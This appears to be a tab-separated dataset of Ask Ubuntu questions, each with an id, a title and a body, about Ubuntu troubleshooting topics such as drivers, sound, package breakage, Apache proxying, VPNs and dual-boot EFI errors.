264208	how do i gvfs-mount without opening a file manager window ?	i like to have my devices mounted in nautilus/nemo by default when i log in , so i can have symlinks to certain directories . and i do n't mean a custom mount or a mount with 10 lines of cryptsetup and luksopen commands that would require me to hardcode a luks password . not only because , but also because it is not compatible with the devices list in nautilus/nemo . to do this , i can have an autostart script ( startup applications ) using gvfs-mount -d like so , very easy to maintain and it will automatically get luks-passwords from the keyring if necessary : # ! /usr/bin/env bash # redsandro 2013-03-01 # mount ( luks ) drives and such domount ( ) { # devices change every now and then . uuid does not . dev=`ls -l -- color=never /dev/disk/by-uuid/ | grep $ uuid | cut -d\ > -f2 | cut -d/ -f3` gvfs-mount -d /dev/ $ dev } # luks-1tb # /dev/sdb1 uuid='9dd6df52-c901-4b70-8151-27086ba7db16' domount # projects 1tb # /dev/sdd1 uuid='6b01a30e-af6e-48b4-810a-f9824558f041' domount # mybook 1 # /dev/sdc2 uuid='b36a4a52-a73d-43b5-a96a-d92074b8ef3f' domount # mybook 2 # /dev/sdc3 uuid='c771609f-018e-45a4-b4f3-5eebc8e67c83' domount however , this will open a window for every device . how can i prevent those windows from opening ?
264211	why does people say 'make install ' is bad ?	i keep seeing people saying make ; make install is bad . i ca n't seem to find anyone with a reasonable explanation . so , why is it bad ? or why does people tend to say `` it 's bad , use clear install instead '' or alike ?
264212	increased cpu temp compared to windows 7	i have a lenovo z570 thinkpad with windows 7 . one of my friends suggested that a 4gb ram is much more effective when working on linux than on windows , so i searched a lot and installed ubuntu 12.04lts . now my system fan is running faster and the cpu temperatures increased . then for a number of days i compared the cpu temperature between ubuntu and windows 7 : i found that when working on ubuntu the temperatures are considerably higher even though the % cpu usage is less than 5 in both . is this normal ? is there any way to reduce the cpu temperature ?
264215	which is best audio video converter on linux ?	which is best audio or video converter on linux ?
264218	my sidebar and topbar disappeared after installing nvidia driver	i have a nvidia geforce 520m graphic card in my laptop and i recently shifted to ubuntu . so i tried to install drivers for the graphic card . when i restarted my computer , my topbar and sidebar vanished . i do n't even see close and minimize options for the folders i open . i can access the terminal and a web browser as their shortcuts are available on the desktop . can someone please help me out of this situation . i tried : unity-reset to delete .so file form the diveres x11/ xorg reset nothing worked . 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf119 [ geforce gt 520m ] ( rev a1 )
264219	huawei e1550 not detected	my huawei e1550 ( which previously worked ok ) is not detected . in order to get it to work , i used codeswitch successfully . the blue light ( or green depending on coverage ) pulses ok but my machine appears not to see it at all . here 's lsusb output with it plugged in : nick @ nick-laptop : ~ $ lsusb bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub here 's lsusb with nothing plugged in : nick @ nick-laptop : ~ $ lsusb bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub here 's lsusb with a sandisk usb memory stick plugged in ( to show usb port is ok ) : nick @ nick-laptop : ~ $ lsusb bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 006 : id 0781:5151 sandisk corp. cruzer micro flash drive bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
264225	i want to be able to chat from my desktop , any suggestions ?	i had empathy working before but lost it to some bad advice from another post now i have no ability to chat from my desktop and i need to communicate with my professors at school . thanks in advance !
264230	what is the proper way to logout a profile when a certain program is closed ?	i have a point of sale kiosk system that needs to logout the user profile whenever the pos system application is closed . at the moment i 've solved this by adding /home/user/.profile ... exec `nautilus -n` & exec /usr/bin/globeonepos to the end of .profile . is there a better way of doing this ?
264231	i have no sound in my computer	the sound card seems disabled . how can i fix it ? i reinstalled my system but when i wanted to watch some videos , there was images but no sound . i hope you can help me . thank you in advance . phil .
264232	ubuntu 12.10 xmodmap reset after usb plug/unplug	in ubuntu 12.10 my .xmodmap settings get lost ( reset ) after i plug/unplug my wireless keyboard/mouse combo . do you know how to prevent or override this behavior ?
264233	qtcreator : set device-debug to wlan-ssh without usb	i am working on/with ubuntu-phone / ubuntu-touch on my gnex in vmware . vmware seems to have usb-problems so i got problems with adb/usb/ssh too . but i am connected to the phone by wlan-ssh . is it possible to configure the 'device ' in creator to wlan-ssh without having usb-connection to the phone ? regards subupack
264234	ext4/fd ( sda1 ) : previous i/o error to superblock detected	i am using ubuntu 11.10 32 bit . yesterday , my computer had some line error during boot-time , showed ext4/fd ( sda1 ) : previous i/o error to superblock detected screenshot : on this condition , my compie still could reached desktop , but then , my desktop showed a dialog window with unreadable-character . screenshot : after that , it would n't show the unity and some shortcut folders on desktop became unknown-file-like screenshot : could any body tell me what is this and how could i get rid of it ?
264235	can not sync ubuntu one client in windows 8	getting information , please wait ... i keep getting the above in windows 8 ( 64 bit ) in the ubuntu one client . i have a problem with syncing in my windows ubuntuone client . i 've searched about this issue , found many advices but no one helps . here 's my logs !
264238	terminal got hanged when editing something in vi	i was making some changes to a remote file in vi using the terminal when i accidently pressed ctrl+s instead of : wq . now everything got hanged . i tried escape , :q ! and all sorts of vi commans but nothing is responding . the terminal screen is stuck . i ca n't close the terminal session as of now as it will lead to loss of all the changes . please suggest what should be done
264243	will it cause problem if i never shutdown my pc and use `suspend` instead of it ?	this has been always a question for me , is it good or bad to leave pc suspended for a long time ( a week for example ) ? is it good or bad to never shut down pc and instead of it use suspend ? will there be any hardware/software problems ? will hard disk shut down during suspension ? will mother board shut down ? will there be any heat problem with cpu ? any kind of helps would be appreciated .
264244	how to delete the .swp files when working remotely	i opened a file in vi , but unfortunately while changing it the terminal crashed . now when i try to open the same file again in a new session it displays the following message e325 : attention found a swap file by the name `` .searchrefineverttabs.jsp.swp '' owned by : nextag dated : tue mar 5 03:30:12 2013 file name : ~nt/deploy/main/main.build.3616.br_ps_1109.2239/ ... ./searchrefineverttabs.jsp modified : yes user name : nextag host name : li1 process id : 9241 while opening file `` searchrefineverttabs.jsp '' dated : tue mar 5 03:35:51 2013 newer than swap file ! ( 1 ) another program may be editing the same file . if this is the case , be careful not to end up with two different instances of the same file when making changes . quit , or continue with caution . ( 2 ) an edit session for this file crashed . if this is the case , use `` : recover '' or `` vim -r searchrefineverttabs.jsp '' to recover the changes ( see `` : help recovery '' ) . if you did this already , delete the swap file `` .searchrefineverttabs.jsp.swp '' to avoid this message . i want to know how can i delete this .swp file . i could n't find it on the path filepath/ ... ../outpdir1`
264245	backup of ubuntu 12.10 from windows	i have installed ubuntu 12.10 from wubi in windows 7 . now i want to format my system . and again install both . so , how i can backup my ubuntu updates and restore them later ? ?
264247	proprietary nvidia drivers with efi on mac , to prevent overheating	i have a dual-boot mac os x 10.8 and kubuntu 12.10 64x on my white macbook from mid-2010 installed . ( model identifier : macbook7,1 . i have upgraded my ram from 2gb to 8gb , if that matters . ) i have the proprietary nvidia drivers installed on my kubuntu . judging from the temperature monitor widget in kubuntu , my temperature seems to be ~10℃ hotter compared to under mac os x . in mac os x i use temperature monitor . i 'm comparing the cpu core 0 and cpu core 1 values in kubuntu to the cpu core 1 and cpu core 2 values in mac os x . 10℃ more may be not a very big overheating disaster , but when i do really intense things on my computer ( such as playing team fortress 2 a while ) my cpu is at ~70℃ on osx , and when playing it a while on kubuntu , my cpu is ~80℃ . i worry that the higher temperature may shorten the lifetime of my laptop . i did some research and found out that it may be that i installed it in bios mode , which causes the heat . i ca n't install it in efi mode , because the propietary nvidia drivers do n't work then ( already tried that , it gave a black screen ) . does anyone know how to get the propietary nvidia drivers work in efi mode ? edit : ok , even if there is n't a way to use the proprietary nvidia drivers in efi mode ( does n't seem like there is a way to do it , i 'm not getting any answers ) , i would already be happy if the heating could be fixed in bios mode . how can i at least fix the heating in bios mode ? i tried putting this in my xorg.conf in the device section to enable power saving : option `` dpms '' `` 1 '' option `` registrydwords '' `` enablebrightnesscontrol=1 ; powermizerenable=0x1 ; perflevelsrc=0x2233 ; powermizerdefault=0x3 '' ... but that did n't work . oh , and i 'm not using refit by the way , could it be that ?
264252	windows 8 wont boot after ubuntu 12.10 installation even after boot repair	i 've bought a dell inspiron 660 preinstalled with windows 8 . when i install ubuntu 12.10 and use boot repair i am able to boot into ubuntu but not windows ( invalid efi file path ) i have tried reinstalling on numerous occasions but still get the same response . i assume i am doing something really simple wrong and would appreciate any help . here is the last output from boot repair : http : //paste.ubuntu.com/5587602/ please do not forget to make your bios boot on sda1/efi/ubuntu/shimx64.efi file !
264254	gnome-tweak-tool turned fonts into rectangles	i installed gnome-tweak-tool to replace the system fonts and add some fonts to /usr/local/share/fonts/truetype . now , all bold fonts look like rectangles . how can i fix it ? screenshot here :
264257	how to open an application in terminal and detach it ?	i opened cairo-dock in my terminal with : open cairo-dock and that worked but if i close the terminal it goes with it . how can i keep it open regardless of the terminal ?
264258	changing vim editor settings ?	how do i change default settings of vim editor such as setting auto indent , setting tab space to 4 and changing text colors ? also how to set vim as the default code editor ?
264261	any alternative to install -f ?	while installing dropbox from the repositories , my laptop ran out of power , and so the system went into a broken state . when i rebooted , i tried two methods to set it right . one was sudo dpkg -- configure -a and sudo apt-get install -f both were working fine , and they were downloading the dropbox package , but owing to my slow internet connection here , it 's never getting completed , and is stuck at ( at most ) 47 % . a sample terminal-shot is setting up nautilus-dropbox ( 1.4.0-3 ) ... dropbox is the easiest way to share and store your files online . want to learn more ? head to http : //www.dropbox.com/ downloading dropbox ... 16 % so if this does n't get completed the package will remain broken for ever , and i wo n't be able to install more software . so if there any way , i can rollback and then download dropbox from the site instead ? i 'm running ubuntu 12.10 . when i run dpkg -l | grep -v ^ii desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-=========================================-=========================================-============-============================================================================== rc libavcodec53 : i386 6:0.8.5-0ubuntu0.12.10.1 i386 libav codec library rc libavutil51 : i386 6:0.8.5-0ubuntu0.12.10.1 i386 libav utility library if nautilus-dropbox 1.4.0-3 i386 dropbox integration for nautilus thanks in advance .
264262	x keyboard layout occasionally resets itself	i have this in my .xinitrc : setxkbmap -layout `` jp , ru '' -option `` grp : alt_shift_toggle '' ( i 'm in japan , have a local keyboard , and occasionally use the russian keyboard layout ) this works fine , most of the time : misha @ misha-lmd : ~ $ setxkbmap -query rules : evdev model : pc105 layout : jp , ru options : grp : alt_shift_toggle but occasionally , i 'm no longer able to switch to russian . when i repeat the above command , i get : misha @ misha-lmd : ~ $ setxkbmap -query rules : evdev model : pc105 layout : jp options : grp : alt_shift_toggle so something is changing the x keyboard layout . what could it be , and how do i get rid of it ? it 's annoying to have to do setxkbmap -layout `` jp , ru '' -option `` grp : alt_shift_toggle '' every time the russian layout stops working .
264266	how do i use multiple amd graphic cards ?	i have 4 5830 's in a intel 64bit powered machine . i was having troubles with windows last night so i decided to try ubuntu . i got all the to downloading and installed amd 's catalyst control center 13.1 for ubuntu . my problem is : i can run $ sudo aticonfig -- lsa [ sudo ] password for user : * 0 . 01:00.0 ati radeon hd 5800 series * - default adapter and find the first card in the first pci lane . but none of the rest seem to show up even when i did $ sudo aticonfig -- adapter=all -- initial $ sudo rebot $ sudo aticonfig -- adapter=all -- odgt adapter 0 - ati radeon hd 5800 series sensor 0 : temperature - 67.00 c i think the main problem is updating the mobo bios which i am still trying to accomplish , does anyone know any solution to the issue i face above though ? i am trying to overall accomplish this http : //www.distrogeeks.com/install-cgminer-2-10-4-ubuntu/ to install cgminer on ubuntu and get back to my mining ! edit : i had posted a response on here from another account but i think this `` bruno '' guy deleted it , as it was not from this account . i ended up removing linux ( it crashed , could n't display anything ? ? ) and installed windows . turned windows on , installed mobo drivers , worked perfectly ? detected all cards first try ... ... . that only thing i think fixed my problem was just moving the cards , and turn the computer on and off until it recognized them all . other than that , that is the only fix .
264269	ca n't install gnome 3.4 extension ?	so i try to install the extension from http : //www.noobslab.com/2012/10/install-gnome-shell-36-and-gnome-shell.html but when i try this in terminal : sudo dpkg -i gs-extensions-extensions-common_3.4.deb i get this : dpkg : error processing gs-extensions-extensions-common_3.4.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : gs-extensions-extensions-common_3.4.deb i dont know what happenned the previous steps worked fine ( i guess ) so anyone know how to fix it ? thanks
264270	installing ubuntu from a bootable usb , what size to make partitions ?	well , i have to switch over to ubuntu last night after a disastrous reformatting . and i have some questions . so i successfully got ubuntu going from the usb and i selected to also install it onto the hdd . it told me i needed to make a root directory ( or something along those lines ) to install ubuntu . after some search i found i need to make a `` / '' a `` /boot '' and a `` swapspace '' partition . i then read `` /boot '' is not needed . so i made a 4096mb swapspace ( hopefully more than i 'll ever need ) . then i made a `` \ '' with the reaming space on the 1tb hdd . is this right ? i feel like the `` \ '' should 've been like tops 10gb and then the rest unallocated ? i think as it is now i will not be able to save a file because `` / '' is allocated to everything ? or did i do it right and `` / '' has all free space to work with. ? what are the normal partitions i would want under ubuntu ? ( sorry got a lot of \ and / mixed up )
264271	multiple dropbox accounts on the same computer	has anyone tried running multiple dropbox accounts on one computer ? what i would like is for every user to have their own dropbox account/folder . on the dropbox help center they write : for our advanced users another option is to use a different dropbox account for each user login on your computer . while this technically means you can have several dropbox folders on the same computer , you will have to switch between each user account to take advantage of dropbox 's syncing features . this method is best for groups or families that have individual dropbox accounts and use unique user logins on the same computer . has anyone tried this setup in ubuntu ? my question has two parts : does it work in the simple case when only one user is logged in at a time ? what happens if two users are logged in ( i log in as user one , then switch to user two without logging out ) ? does the synchronization go haywire ?
264272	no sound output ( msi k8n neo4/ck804 ac'97 )	i have a k8n neo4 motherboard with a built in ac'97 sound card . it has a digital spdif output i wish to utilize . my reciever is a denon avr 1709 which supports afaik dts/ac3 in 44100 & 48000 hz . ( it works with atv2+xbmc+spdif/passthrough ) . uname -a : linux monster 3.5.0-25-generic # 39~precise1-ubuntu smp tue feb 26 00:07:14 utc 2013 x86_64 x86_64 x86_64 gnu/linux lsmod|grep snd : snd_intel8x0 38578 3 snd_ac97_codec 134870 1 snd_intel8x0 ac97_bus 12767 1 snd_ac97_codec snd_pcm 97523 3 snd_intel8x0 , snd_ac97_codec snd_seq_midi 13325 0 snd_rawmidi 30750 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq snd 83674 12 snd_intel8x0 , snd_ac97_codec , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 15092 1 snd snd_page_alloc 18573 2 snd_intel8x0 , snd_pcm aplay -l : default playback/recording through the pulseaudio sound server sysdefault : card=ck804 nvidia ck804 , nvidia ck804 default audio device front : card=ck804 , dev=0 nvidia ck804 , nvidia ck804 front speakers surround40 : card=ck804 , dev=0 nvidia ck804 , nvidia ck804 4.0 surround output to front and rear speakers surround41 : card=ck804 , dev=0 nvidia ck804 , nvidia ck804 4.1 surround output to front , rear and subwoofer speakers surround50 : card=ck804 , dev=0 nvidia ck804 , nvidia ck804 5.0 surround output to front , center and rear speakers surround51 : card=ck804 , dev=0 nvidia ck804 , nvidia ck804 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=ck804 , dev=0 nvidia ck804 , nvidia ck804 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=ck804 , dev=0 nvidia ck804 , nvidia ck804 - iec958 iec958 ( s/pdif ) digital audio output dmix : card=ck804 , dev=0 nvidia ck804 , nvidia ck804 direct sample mixing device dmix : card=ck804 , dev=2 nvidia ck804 , nvidia ck804 - iec958 direct sample mixing device dsnoop : card=ck804 , dev=0 nvidia ck804 , nvidia ck804 direct sample snooping device dsnoop : card=ck804 , dev=2 nvidia ck804 , nvidia ck804 - iec958 direct sample snooping device hw : card=ck804 , dev=0 nvidia ck804 , nvidia ck804 direct hardware device without any conversions hw : card=ck804 , dev=2 nvidia ck804 , nvidia ck804 - iec958 direct hardware device without any conversions plughw : card=ck804 , dev=0 nvidia ck804 , nvidia ck804 hardware device with all software conversions plughw : card=ck804 , dev=2 nvidia ck804 , nvidia ck804 - iec958 hardware device with all software conversions a52 : card=ck804 nvidia ck804 current settings ( changes vs stock ) : /etc/pulse/daemon.conf default-sample-channels = 6 enable-lfe-remixing = yes /etc/modprobe.d/alsa-base.conf : options snd-hda-intel model=auto this is my alsamixer : http : //imgur.com/ay3t8t8.png this is my pacmd / list-sinks output : http : //i.imgur.com/j88fz67.png > > > list-sinks 1 sink ( s ) available . * index : 0 name : < alsa_output.pci-0000_00_04.0.iec958-ac3-surround-51 > driver : < module-alsa-card.c > flags : hardware decibel_volume latency state : suspended suspend cause : idle priority : 9958 volume : 0 : 100 % 1 : 100 % 2 : 100 % 3 : 100 % 4 : 100 % 5 : 100 % 0 : 0.00 db 1 : 0.00 db 2 : 0.00 db 3 : 0.00 db 4 : 0.00 db 5 : 0.00 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max request : 0 kib max rewind : 0 kib monitor source : 0 sample spec : s16le 6ch 44100hz channel map : front-left , front-right , rear-left , rear-right , front-center , lfe surround 5.1 used by : 0 linked by : 1 fixed latency : 95.99 ms card : 0 < alsa_card.pci-0000_00_04.0 > module : 4 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` '' alsa.id = `` '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` '' alsa.device = `` 0 '' device.string = `` a52:0 '' device.buffering.buffer_size = `` 50796 '' device.buffering.fragment_size = `` 16932 '' device.access_mode = `` mmap '' device.profile.name = `` iec958-ac3-surround-51 '' device.profile.description = `` digital surround 5.1 ( iec958/ac3 ) '' device.description = `` digital surround 5.1 ( iec958/ac3 ) '' alsa.card = `` 0 '' alsa.card_name = `` nvidia ck804 '' alsa.long_card_name = `` nvidia ck804 with alc850 at irq 22 '' alsa.driver_name = `` snd_intel8x0 '' device.bus_path = `` pci-0000:00:04.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:04.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 10de '' device.vendor.name = `` nvidia corporation '' device.product.name = `` ck804 ac'97 audio controller '' device.form_factor = `` internal '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' i have also fiddled around a lot in unity , pavucontrol , the standard audio settings etc . nothing seems to help . at some points in my travels i have managed to get white noise out in the front speakers . i have also once managed to get normal stereo sound out once . `` speaker-test -c6 `` sometimes ( sometimes as with some certain settings ) produces white noise in two channels ( never all 6 ) . i dont have sound out from my normal 3.5mm stereo plugs either , neither front or back . i have tried reinstalling alsa/pulseaudio many times , also reverting back to complete stock settings with no measurable successes . sorry about the images , i cant copy-paste the text properly formatted for some reason . is it possible something defaults to use the analog spdif instead of the optical ? is there some idiot-safe way to get this working ? right now i would be happy to even have a reliable way to produce analog ( 3.5mm ) stereo output just to make sure there isnt something fundamentally broken .
264274	ltsp thin client to single user mode	is it possible to boot a ltsp thin client to single user mode ? i 've updated the default entry under /var/lib/tftpboot/ltsp/i386/pxelinux.cfg to read as follows : - append ro initrd=initrd.img root=/dev/nbd0 init=/sbin/init-ltsp nomodeset quiet splash **single** plymouth : force-splash vt.handoff=7 nbdroot= : ltsp_i386 this kind of works ! i see the boot progress to the point where it asks me to either enter the root password or ctrl+d to bypass . however , the boot process just seems to continue without providing an chance to do either .
264280	how to remove items from places sidebar in nautilus 3.6 ?	i am attempting to remove bookmarks from the places sidebar in nautilus 3.6 . specifically , i would like to remove the `` pictures '' item . i have found answers for older versions in which one can remove or edit entries in ~/.config/user-dirs.dirs . however , this does not seem to work in 3.6 . i am running ubuntu 12.10 with gnome . removing things in the bookmarks menu does not seem to change anything and the option to remove by right clicking is grayed out . thanks !
264283	switch terminal output language from native language to english	how can i switch the terminal output language from my native language to english , so i can post my ask ubuntu question with english terminal output ( error messages ) ?
264292	how do i install virtualbox 's deb package ?	i have downloaded virtualbox.deb package . but i do n't know how to install this application . please anyone let me know how to install it..
264296	i ( stupidly ) left my laptop logged in , can i find out what was done while i was n't there ?	i am acutely aware i may be overly paranoid here . i left my laptop unattended by myself ( i trusted a friend who was beside it ) . he assures me it was not touched . when i returned i was still logged in . when the network went down shortly later i was clicking through my connections and found my ethernet connection ( which i never use , and was unplugged before and after ) had last been in use 40 minutes earlier ( while i left it unattended ) . this ethernet port `` unfolds '' from the laptop and was unfolded ( could have been when i took it out of my bag ) which is unusual , i did not consciously open it . at that point the network was stable ( and is wifi ) , i took a look in the auth logs but have no idea how to get time stamps or even where i could look to see if something was used . at least i am sure no sudo attempts were made/failed . should i be worried/go and speak to security ? there is video surveillance there which is my next stop when i am more certain . any advice would be appreciated .
264297	what 's the difference ( advantages/drawbacks ) between installing ubuntu physically on a hard drive and virtually by vmware ?	i 've installed a ubuntu 12.10 virtually with vmware 9.0 and it works fine with me . my question : what 's the difference ( advantages/drawbacks ) between installing ubuntu physically on a hard drive and virtually by vmware especially effect on running programs and using for programming cpu usage and memory
264303	tab and backtick keys not working	i recently installed 12.10 server edition on my eeepc laptop and have discovered that the backtick and tab keys do n't work . i have n't used this particular computer for a while so it might be a hardware problem . how can i determine if it is hardware or software ?
264305	nexus 4 do not start after software transfer ( made with qt sdk ) , what can i do ?	i flashed my nexus4 with ubuntu , and it worked as promised . then i installed qt sdk in my ubuntu pc . after that i tried currencyconverter qml-tutorial project . it worked just fine with pc . after that it tried to transfer it to nexus with ctrl+f12 . and there was the currencyconverter-screen on my nexus4 ! ! but : the screen was totally dead . and nothing happened what ever i tried . i desided to wait to get battery finished just to have a fresh start . but : nexus4 is now totally dead and do not start .
264308	bcm4312/dell 1397 wlan minicard drivers for ubuntu 12.10 live usb ?	i 'm trying to run ubuntu 12.10 32-bit from a live usb , and it does n't detect my dell 1397 wireless card . ( i know there are many seemingly duplicates here but so far i have n't found any other case of this happening . ) i 've followed these instructions where to get dell inspiron 1545 drivers for the dell 1397 wlan minicard wireless card ? , ie executing sudo apt-get update ; sudo apt-get install bcmwl-kernel-source and the card is inmediately detected . it is however impossible to subsequently boot the usb drive afterwards , as it throws a kernel panic booting up . which is the proper way to get the dell 1397 driver working under ubuntu 12.10 live usb with a persistance file size of 2gb ? i can recreate the live cd , so there 's no need for instructions on how to recover that installation . i do need however a definitive answer : there are way too many different responses on seemingly similar questions here .
264310	why dont proxypass work in apache hardy box with virtual hosts ?	i have an ubuntu hardy server used as a web server with apache 2.2 . i am trying to set it up with named virtual hosts , and in my /etc/apache2/apache2.conf file i have the following lines : namevirtualhost * include /etc/apache2/sites-enabled/ i have two files in sites-enabled . one of them containing : < virtualhost * > serveradmin webmaster @ met.no servername arcticdata.met.no documentroot /metno/metamod/arcticdata/htdocs ... < /virtualhost > the other is similar , but with another servername and documentroot . if i run apachectl configtest i get the following warning : [ warn ] namevirtualhost *:0 has no virtualhosts but anyway it seems the virtual host mechanism is working , since i get to an index.html file placed in documentroot in both cases . but i also use redirect to a catalyst process on the same server , and these redirects does not seem to work : proxypass /metamod/ http : //127.0.0.1:3011/ proxypassreverse /metamod/ http : //127.0.0.1:3011/ hovever , if i enter the ip address and port number in the -directive ( in place of * ) , these redirects suddenly works . but then i have another problem . now running apachectl configtest gives the following output : [ warn ] virtualhost 157.249.32.169:80 overlaps with virtualhost 157.249.32.169:80 , the first has precedence , perhaps you need a namevirtualhost directive [ warn ] namevirtualhost *:0 has no virtualhosts and only the first virtual host work . i am also running a similar setup on a lucid box , and this works ok. are there changes in how apache 2.2 is configured between hardy and lucid ? the hardy box has apache 2.2.8 and the lucid box has apache 2.2.14 . any suggestions appreciated . egil
264311	forticlient vpn connected but no ip	i am on ubuntu 12.04 . i managed to install the forticlient after lots of search and mainly by installing everything suggested on these pages : fortinet ssl vpn client and ubuntu 12.04 forticlient ssl vpn binary not running now i have it running and the connection status indicates tunnel running and i see bytes receives and send bytes . i am trying to connect to remote desktop to a windows 7 machine but it does n't work . first thing first i check if i ping the machine and no it does n't ping . i looked under devices - network tools , i can see that there was no interface created for the vpn and i do n't have an ip for the tunnel . i only have my local network ip . i tried the 2010 and 21467 versions . can someone help on this ?
264312	non working microphone with smartphone headset	i plugged in my samsung smartphone headset on my lenovo thinkpad w520 and although the sound that comes out from the earbuds works properly it seems that the microphone is not working at all.i looked around the laptop in case there is a dedicated port for microphone , but i noticed that the headphones port is also the port for the mic as well.in the sound settings it shows the mic of the headset , but when i say something to test the mic it does n't show any reaction at the sound bar on the bottom of the sound settings window .
264313	ubuntu software center - unable to see installed software	i use ubuntu software center without any significant problems with installing/unistalling any software . but then something happened ( may be during some unsccessful installation ) and then i ca n't access the list of installed programs in ubuntu software center .
264315	firestarter , proxy and limited number of ip addresses to access	on my local network i have to setup linux ubuntu boxes , so users will be able to access only to few ( 2-3 ) domains . also , all of those linux ubuntu boxes are behind proxy . tried to configure this using firestarter , but i did not make it after several hours of attempts . most of the time , i was able to access to all of internet , or was n't at all - in firefox i was getting the message : the proxy server is refusing connections . ip address of proxy server is 192.168.21.155 . what i tried with firestarter is to define outbound traffic policy as restrictive by default = > whitelist traffic = > allow connections to host : 192.168.21.155 , and several ip addresses i want to give access . but no luck , all of the websites where blocked in this case . also , tried to allow service dns ( port 53 ) , and http-alt ( port 8080 ) to several ip addresses i want to give access . but i did not make it . also , i removed ufw ( uncomplicated firewall ) with all of it 's definition , and on iptables i have no rule defined . can you help me please how to configure firewall in this case ?
264318	installing windows 7 hide ubuntu on my machine	i had ubuntu installed on my laptop . i installed windows 7 and now i ca n't access ubuntu . but the partition is there . i thought i would get a choice of operating systems at the start but i do n't . i want them both . how do i get a choice of operating systems during system start up ?
264325	migrate ubuntu one to a new pc	i had my old pc with ubuntu one and had 1 folder ( called projects ) being sync . ( over 2gb of data ) i got a new pc and transfered all my files to the new pc , including the `` projects '' folder . now ubuntu one shows that the `` projects '' folder can sync locally ( but is not active ) . i have a new device ( my new pc ) and other devices ( old pc , not used any more ) my question is : how can i sync my `` projects '' folder now ? just mark the option ? i am afraid that if i mark the option at ubuntu one , that i can loose data , or i have to download all the folder from the internet , or send all data to ubuntu one again . regards
264331	failed kernel install results in apt and dpkg failure due to dependencies and configuration issues	i have seen some similar questions but none that i have seen have resolved my issue . an error occured durring a kernel upgrade on ubuntu 12.04 from linux-image-3.2.0-36-generic to linux-image-3.2.0-38-generic . a kernel panic occurs on boot while booting with 3.2.0-38 . booting in under `3.2.0-36 the system starts normally . however when i attempt to remove clean or configure the affected kernel package it throws the following error : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : initramfs-tools : depends : initramfs-tools-bin ( < 0.99ubuntu13.1~ ) but 0.99ubuntu13.1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . attempting sudo apt-get -f install , meets with no success citing dependency and configuration issues , after the package retrevial : dpkg : dependency problems prevent configuration of initramfs-tools : initramfs-tools depends on initramfs-tools-bin ( < < 0.99ubuntu13.1~ ) ; however : version of initramfs-tools-bin on system is 0.99ubuntu13.1 . dpkg : error processing initramfs-tools ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-3.2.0-38-generic : linux-image-3.2.0-38-generic depends on initramfs-tools ( > = 0.36ubuntu6 ) ; however : package initramfs-tools is not configured yet . dpkg : error processing linux-image-3.2.0-38-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of casper : casper depends on initramfs-tools ( > = 0.92bubuntu55 ) ; however : package initramfs-tools is not configured yet . dpkg : error processing casper ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : initramfs-tools linux-image-3.2.0-38-generic casper e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i receive similar errors when running dpkg -- configure -a , apt-get -f dist-upgrade and apt-get -f autoremove . any ideas on what exactly corrupted during the kernel upgrade and how i can roll back my kernel version without using apt-get or dpkg ?
264335	how to edit squid.conf file in notepad/gedit without using vi editor	i have installed squid proxy server and i want to edit the squid.conf file with gedit . i dont want to use vi editor . can it be possible ?
264336	clone git from samba network share	has anybody successfully cloned git repository to ubuntu from a samba network share ? i have access over file manager and can ls over command line , but can not clone also , in git cola , qgit and gitg i can not see mounted samba network share .
264340	what is the optimal configuration for a laptop with a 24gb ssd cache ?	i have a sony vaio ultrabook that contains a 24gb ssd drive and a 750gb hard disk . what is the optimal configuration for installing ubuntu on this to get the most out of the hardware ? would i be better off putting the / on the ssd and /home on the hard drive , or attempting to use something like bcache ? i 'm not interested in dual booting .
264342	windows not booting , need help !	i have a hp pavillion g6 with windows 8 , and ubuntu 12.10 . after installing ubuntu , ubuntu didnâ´t startup , becauase windows started up . so i did a repair with boot repair , but now ubuntu is starting up , and not windows . the error is : error invalid efi path .
